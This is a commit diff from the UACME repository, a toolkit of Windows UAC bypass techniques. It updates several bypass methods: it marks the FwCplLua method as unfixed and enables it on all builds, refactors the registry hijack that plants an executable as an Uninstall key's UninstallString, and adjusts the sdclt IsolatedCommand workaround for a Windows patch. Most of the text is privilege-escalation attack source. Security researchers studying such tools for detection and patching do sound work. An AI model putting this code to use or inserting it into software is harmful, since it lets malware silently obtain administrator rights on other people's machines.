mirror of https://github.com/hfiref0x/UACME.git
v 2.9.0
Internal rearrange. Marking 42 as unfixed again as it produces mixed results on different Windows 10 builds.
This commit is contained in:
hfiref0x
parent
182bf30266
commit
d033e6cd41
|
|
@ -393,8 +393,8 @@ Keys (watch debug output with dbgview or similar for more info):
|
|||
* Component(s): Attacker defined
|
||||
* Implementation: ucmFwCplLuaMethod
|
||||
* Works from: Windows 7 (7600)
|
||||
* Fixed in: Windows 10 RS4 (17134)
|
||||
* How: Shell API update
|
||||
* Fixed in: unfixed :see_no_evil:
|
||||
* How: -
|
||||
43. Author: Oddvar Moe derivative
|
||||
* Type: Elevated COM interface
|
||||
* Method: IColorDataProxy, ICMLuaUtil
|
||||
|
|
|
|||
Binary file not shown.
|
|
@ -34,6 +34,8 @@
|
|||
#define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\"
|
||||
#define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration"
|
||||
#define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls"
|
||||
#define T_UNINSTALL L"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"
|
||||
|
||||
#define T_MSC_SHELL L"Software\\Classes\\mscfile"
|
||||
#define T_EXEFILE_SHELL L"Software\\Classes\\exefile"
|
||||
#define T_MSSETTINGS L"Software\\Classes\\ms-settings"
|
||||
|
|
@ -52,6 +54,8 @@
|
|||
#define T_ISOLATEDCOMMAND L"IsolatedCommand"
|
||||
#define T_DELEGATEEXECUTE L"DelegateExecute"
|
||||
|
||||
#define T_UNINSTALL_STRING L"UninstallString"
|
||||
|
||||
#define BINARYPATH_TAG L"binarypatch01"
|
||||
|
||||
#define MSFT_FULL L"Microsoft Corporation"
|
||||
|
|
|
|||
|
|
@ -4,9 +4,9 @@
|
|||
*
|
||||
* TITLE: COMET.C
|
||||
*
|
||||
* VERSION: 2.87
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 19 Jan 2018
|
||||
* DATE: 16 July 2018
|
||||
*
|
||||
* Comet method (c) BreakingMalware
|
||||
* For description please visit original URL
|
||||
|
|
@ -123,7 +123,7 @@ BOOL ucmCometMethod(
|
|||
persistFile->lpVtbl->Release(persistFile);
|
||||
|
||||
_strcpy(szCombinedPath, g_ctx.szTempDirectory);
|
||||
_strcat(szCombinedPath, L"huy32");
|
||||
_strcat(szCombinedPath, SOMEOTHERNAME);
|
||||
_strcpy(szLinkFile, szCombinedPath);
|
||||
_strcat(szLinkFile, T_CLSID_MYCOMPUTER_COMET);
|
||||
|
||||
|
|
|
|||
|
|
@ -4,9 +4,9 @@
|
|||
*
|
||||
* TITLE: ENIGMA0X3.C
|
||||
*
|
||||
* VERSION: 2.89
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 14 Jun 2018
|
||||
* DATE: 16 July 2018
|
||||
*
|
||||
* Enigma0x3 autoelevation methods and everything based on the same
|
||||
* ShellExecute related registry manipulations idea.
|
||||
|
|
@ -478,22 +478,23 @@ BOOL ucmSdcltIsolatedCommandMethod(
|
|||
// There is a fix of original concept in 16237 RS3.
|
||||
// Bypass it.
|
||||
//
|
||||
if (g_ctx.dwBuildNumber >= 16237)
|
||||
if (g_ctx.dwBuildNumber >= 16237) {
|
||||
lpTargetValue = TEXT("");
|
||||
}
|
||||
else {
|
||||
lpTargetValue = T_ISOLATEDCOMMAND;
|
||||
|
||||
//
|
||||
// Save old value if exist.
|
||||
//
|
||||
cbOldData = MAX_PATH * 2;
|
||||
RtlSecureZeroMemory(&szOldValue, sizeof(szOldValue));
|
||||
lResult = RegQueryValueEx(hKey, lpTargetValue, 0, NULL,
|
||||
(BYTE*)szOldValue, &cbOldData);
|
||||
if (lResult == ERROR_SUCCESS)
|
||||
bExist = TRUE;
|
||||
}
|
||||
|
||||
//
|
||||
// Save old value if exist.
|
||||
//
|
||||
cbOldData = MAX_PATH * 2;
|
||||
RtlSecureZeroMemory(&szOldValue, sizeof(szOldValue));
|
||||
lResult = RegQueryValueEx(hKey, lpTargetValue, 0, NULL,
|
||||
(BYTE*)szOldValue, &cbOldData);
|
||||
if (lResult == ERROR_SUCCESS)
|
||||
bExist = TRUE;
|
||||
|
||||
cbData = (DWORD)((1 + sz) * sizeof(WCHAR));
|
||||
|
||||
lResult = RegSetValueEx(
|
||||
|
|
|
|||
|
|
@ -4,9 +4,9 @@
|
|||
*
|
||||
* TITLE: EXPLIFE.C
|
||||
*
|
||||
* VERSION: 2.87
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 19 Jan 2018
|
||||
* DATE: 19 July 2018
|
||||
*
|
||||
* ExpLife UAC bypass using IARPUninstallStringLauncher.
|
||||
* For description please visit original URL
|
||||
|
|
@ -104,7 +104,7 @@ BOOL ucmUninstallLauncherMethod(
|
|||
if (CoCreateGuid(&guid) != S_OK)
|
||||
break;
|
||||
|
||||
_strcpy(szKeyName, TEXT("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\"));
|
||||
_strcpy(szKeyName, T_UNINSTALL);
|
||||
if (StringFromGUID2(&guid, szGuid, sizeof(szGuid) / sizeof(WCHAR))) {
|
||||
_strcat(szKeyName, szGuid);
|
||||
|
||||
|
|
@ -115,7 +115,7 @@ BOOL ucmUninstallLauncherMethod(
|
|||
break;
|
||||
|
||||
cbData = (1 + _strlen(lpszExecutable)) * sizeof(WCHAR);
|
||||
lResult = RegSetValueEx(hKey, TEXT("UninstallString"), 0, REG_SZ, (BYTE*)lpszExecutable,
|
||||
lResult = RegSetValueEx(hKey, T_UNINSTALL_STRING, 0, REG_SZ, (BYTE*)lpszExecutable,
|
||||
(DWORD)cbData);
|
||||
|
||||
if (lResult != ERROR_SUCCESS)
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@
|
|||
*
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 10 July 2018
|
||||
* DATE: 01 Aug 2018
|
||||
*
|
||||
* UAC bypass dispatch.
|
||||
*
|
||||
|
|
@ -68,7 +68,7 @@ UCM_API(MethodSPPLUAObject);
|
|||
ULONG CALLBACK IsMethodNeedRemediation(
|
||||
PVOID Parameter);
|
||||
|
||||
UCM_EXTRA_CONTEXT g_ucmWDCallback = { IsMethodNeedRemediation, NULL };
|
||||
UCM_EXTRA_CONTEXT g_ucmWDCallback;
|
||||
|
||||
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
|
||||
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
|
||||
|
|
@ -113,7 +113,7 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
|
|||
{ MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
|
||||
{ MethodCOMHandlers, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
|
||||
{ MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
|
||||
{ MethodFwCplLua, &g_ucmWDCallback, { 7600, 17134 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
|
||||
{ MethodFwCplLua, &g_ucmWDCallback, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
|
||||
{ MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
|
||||
{ MethodVolatileEnv, NULL, { 7600, 16229 }, FUBUKI_ID, FALSE, TRUE, TRUE },
|
||||
{ MethodSluiHijack, &g_ucmWDCallback, { 9600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },
|
||||
|
|
@ -122,6 +122,26 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
|
|||
{ MethodSPPLUAObject, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
|
||||
};
|
||||
|
||||
/*
|
||||
* SetupExtraContextCalbacks
|
||||
*
|
||||
* Purpose:
|
||||
*
|
||||
* Configure extra context callbacks.
|
||||
*
|
||||
*/
|
||||
VOID SetupExtraContextCalbacks(
|
||||
VOID
|
||||
)
|
||||
{
|
||||
g_ucmWDCallback.Parameter = (PVOID)g_ctx.IsWow64;
|
||||
g_ucmWDCallback.Routine = IsMethodNeedRemediation;
|
||||
|
||||
//
|
||||
// Reserved for future use.
|
||||
//
|
||||
}
|
||||
|
||||
/*
|
||||
* IsMethodNeedRemediation
|
||||
*
|
||||
|
|
@ -266,6 +286,8 @@ BOOL MethodsManagerCall(
|
|||
}
|
||||
}
|
||||
|
||||
SetupExtraContextCalbacks();
|
||||
|
||||
bResult = Entry->Routine(Method, Entry->ExtraContext, PayloadCode, PayloadSize);
|
||||
|
||||
if (PayloadCode) {
|
||||
|
|
@ -938,7 +960,7 @@ UCM_API(MethodFwCplLua)
|
|||
if (g_ctx.dwBuildNumber >= 9600) {
|
||||
if (ExtraContext) {
|
||||
if (ExtraContext->Routine) {
|
||||
if (ExtraContext->Routine((PVOID)g_ctx.IsWow64) != STATUS_NO_SECRETS)
|
||||
if (ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS)
|
||||
g_ctx.MethodExecuteType = ucmExTypeRemediationRequired;
|
||||
}
|
||||
}
|
||||
|
|
@ -993,14 +1015,13 @@ UCM_API(MethodSluiHijack)
|
|||
LPWSTR lpszPayload = NULL;
|
||||
|
||||
UNREFERENCED_PARAMETER(Method);
|
||||
UNREFERENCED_PARAMETER(ExtraContext);
|
||||
UNREFERENCED_PARAMETER(PayloadCode);
|
||||
UNREFERENCED_PARAMETER(PayloadSize);
|
||||
|
||||
if (g_ctx.dwBuildNumber >= 9600) {
|
||||
if (ExtraContext) {
|
||||
if (ExtraContext->Routine) {
|
||||
if (ExtraContext->Routine((PVOID)g_ctx.IsWow64) != STATUS_NO_SECRETS)
|
||||
if (ExtraContext->Routine(ExtraContext->Parameter) != STATUS_NO_SECRETS)
|
||||
g_ctx.MethodExecuteType = ucmExTypeRemediationRequired;
|
||||
}
|
||||
}
|
||||
|
|
@ -1063,4 +1084,4 @@ UCM_API(MethodSPPLUAObject)
|
|||
return ucmSPPLUAObjectMethod(PayloadCode, PayloadSize);
|
||||
}
|
||||
|
||||
#pragma warning(pop)
|
||||
#pragma warning(pop)
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@
|
|||
*
|
||||
* VERSION: 2.90
|
||||
*
|
||||
* DATE: 10 July 2018
|
||||
* DATE: 01 Aug 2018
|
||||
*
|
||||
* Prototypes and definitions for UAC bypass methods table.
|
||||
*
|
||||
|
|
|
|||
|
|
@ -1,27 +1,27 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|Win32'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='ReleaseInternal|x64'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LocalDebuggerCommandArguments>0</LocalDebuggerCommandArguments>
|
||||
<LocalDebuggerCommandArguments>42</LocalDebuggerCommandArguments>
|
||||
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
|
||||
</PropertyGroup>
|
||||
</Project>
|
||||
16
UACME.sha256
16
UACME.sha256
|
|
@ -12,20 +12,20 @@ a0a07303b0cf4591542c18436aa579d0ed91f880fcdf01e2796b5bf03dc311d0 *Source\Akagi\b
|
|||
5eafc42613cbf70c4ee53f0511befc8a0ddd212f83387877a9883d05036f493c *Source\Akagi\bin64res.rc
|
||||
c401577184f2f57d56fea4c03e0cc1c18a7785bf8b251ca658ade5685a9848c3 *Source\Akagi\compress.c
|
||||
9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h
|
||||
f98bea095c00078ae9be90e276ff36cceeaecd8f3c3bc79a8ba0db3e72d92aeb *Source\Akagi\consts.h
|
||||
2941a15a2787f4e2d5fafa8cde6db6d898135951df5bbe1059ff3cf87f4e18d3 *Source\Akagi\consts.h
|
||||
44bd12f1712f8390bda2ecd6fb4e763c320239ac25e31f426bd91656647bf38d *Source\Akagi\global.h
|
||||
4e740d5caffc8068a07e6ca862ed85de1de383e45cf31013c9e36efdf6a8b111 *Source\Akagi\main.c
|
||||
a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c
|
||||
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
|
||||
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
|
||||
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
|
||||
49b33e6032f42dde93e7b03efb17290eaf65c4fab95b5753fbf335722916cb52 *Source\Akagi\Resource.rc
|
||||
0de1eadbf92af6616dc03fbf8a0800166f42613f0a31680f940c3aa309587ba2 *Source\Akagi\Resource.rc
|
||||
b002efa2d4bebd83b8fad8b6d2ec525de57919796bffa0577ab49a7a179cba7f *Source\Akagi\sup.c
|
||||
3479b565d7a469087825838cd724eb58187e4df92ff86e2f65dde746fca8ec17 *Source\Akagi\sup.h
|
||||
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
|
||||
a7d382431eb421142fcc28156364f60e807ca4818b350a6b6b614ab6542e9074 *Source\Akagi\uacme.vcxproj
|
||||
92069b7b38ee6ce5c2e8a9189c078f2ccd251fab0514d362d5f0a13e95d08aeb *Source\Akagi\uacme.vcxproj.filters
|
||||
cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user
|
||||
cd9b79b5e8e8a9c2a7a8afcf49d685f50368fb20ad2d4c133eb835e133ad82d5 *Source\Akagi\uacme.vcxproj.user
|
||||
425b613c924b247fbd40967f4d25c432edddef1c1599cb5cb5c50f5cf0490b6e *Source\Akagi\bin\Akatsuki64.cd
|
||||
1a2e3df7ad3adc7e4c381e5dc2169e759567bd5c3801b38cc50180c81aad8756 *Source\Akagi\bin\Fubuki32.cd
|
||||
579e447729ba32e0d5d69146acbc048e3aaa8c9f404c0ae481f44d494ff77bae *Source\Akagi\bin\Fubuki64.cd
|
||||
|
|
@ -49,15 +49,15 @@ fbab853743692f7d3fa52343e85518aa9fdc462b389c9847e5f8628efb7432d3 *Source\Akagi\m
|
|||
86471743844fedc7910c20b259c55504c4f28dad9df7c8f95a67fa626727ecbf *Source\Akagi\methods\carberp.c
|
||||
16253a3986916f936630970a044d62d20dcce961ed074c988013ee17669b9906 *Source\Akagi\methods\carberp.h
|
||||
c62f98b79c86e4fa6b90f8af480f18bc21e2dc90af268ce6ba6e343789ac3856 *Source\Akagi\methods\cdproxy.h
|
||||
020c20e6c225f4fde1b7df23c9d56ffe903a9f45936814984d8a72b1b7b82cc1 *Source\Akagi\methods\comet.c
|
||||
ade9abba42c00fa2f7427a88ca8035180dfd62acabb1831ee68584af2486653e *Source\Akagi\methods\comet.c
|
||||
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
|
||||
5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c
|
||||
7c1e67ec03370d4e97fc5947a832090bf8283641c19f7cad1cb8f3d93385bac2 *Source\Akagi\methods\comfileop.h
|
||||
be2ceae57389dcaf814cd5e1fc1c137979b71671eca44a4db445fa2824591691 *Source\Akagi\methods\deroko.c
|
||||
51d35d30ca8bc6a72202fa26aa6f2cb648036d62635cb52d52ee2d6bbc07da2b *Source\Akagi\methods\deroko.h
|
||||
e681867973300526880dd883b71c56de360c4a5c6dbb2ff2e8b43ee3d9cc2469 *Source\Akagi\methods\enigma0x3.c
|
||||
ec11c2f469f7e7f76893e23d7e275f55930f80fd8a080078cfcd86532888e52a *Source\Akagi\methods\enigma0x3.c
|
||||
5c791f3bcdd23a2eabad1afd7205896bc09848d4c62b1efc2c5a777b2b5aabc8 *Source\Akagi\methods\enigma0x3.h
|
||||
8c6acdf8a3a6a2ca5c07cc947ed098c4d6bc8b951558c5f9670048c248748b70 *Source\Akagi\methods\explife.c
|
||||
c81f288adea7caf27d98ba81d7a1350376b72ecdab01edf89b697d77dda4c02e *Source\Akagi\methods\explife.c
|
||||
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
|
||||
3827958bc16dcec779fa5751f1d368370285eb2bddfa30ff803478ee1c2cabf2 *Source\Akagi\methods\fwcpllua.h
|
||||
8430eaf9d06136a6a7e015ccefac85b29476e56024f98a36db5947f8e0fa648e *Source\Akagi\methods\gootkit.c
|
||||
|
|
@ -66,8 +66,8 @@ e681867973300526880dd883b71c56de360c4a5c6dbb2ff2e8b43ee3d9cc2469 *Source\Akagi\m
|
|||
fb16843d3353e3499d902bdbad39a82e045406f4e4a98da4cbcad2cc28d0cce3 *Source\Akagi\methods\hakril.h
|
||||
6194cd6305dadcfbedbb9d68a6f48ecf029e3b2fc03c313009aed7e2cf57edf3 *Source\Akagi\methods\hybrids.c
|
||||
584dbe0e06fbe88a15f358b2f9d9b5b230deb63d4b8c7469db4f6085be2064d6 *Source\Akagi\methods\hybrids.h
|
||||
bcd5ff3516346a3a73ab224caf5fb8656e82086bb4759d7260af2c4555c9c4e0 *Source\Akagi\methods\methods.c
|
||||
a7ddc62ad4a87b9edd8069ccf6c84bc018d6b54fa8c3f6917a9d43279219f36b *Source\Akagi\methods\methods.h
|
||||
bb0f1b7465ff6c0686d4458d6c4e22f45296eae04e46c49316b5cf8b02b4512d *Source\Akagi\methods\methods.c
|
||||
80f45429311e0d30b2bc714a15f17bdad5d40295b13c33271a4fc6e9c5669f15 *Source\Akagi\methods\methods.h
|
||||
58f7b319b79172a6eb4c563db0a40320d4d6d68d02fb3b164c7875c413bd6184 *Source\Akagi\methods\pitou.c
|
||||
cc1a0a414b6f1bc6b1301fd5119371811fbd6cb99b884356df71d960a8933cc8 *Source\Akagi\methods\pitou.h
|
||||
6fd555cf1bd17921e5b4f7aaefb4cc3dca2483159da3e24703c8412e36bb8354 *Source\Akagi\methods\sandworm.c
|
||||
|
|
|
|||
Loading…
Reference in New Issue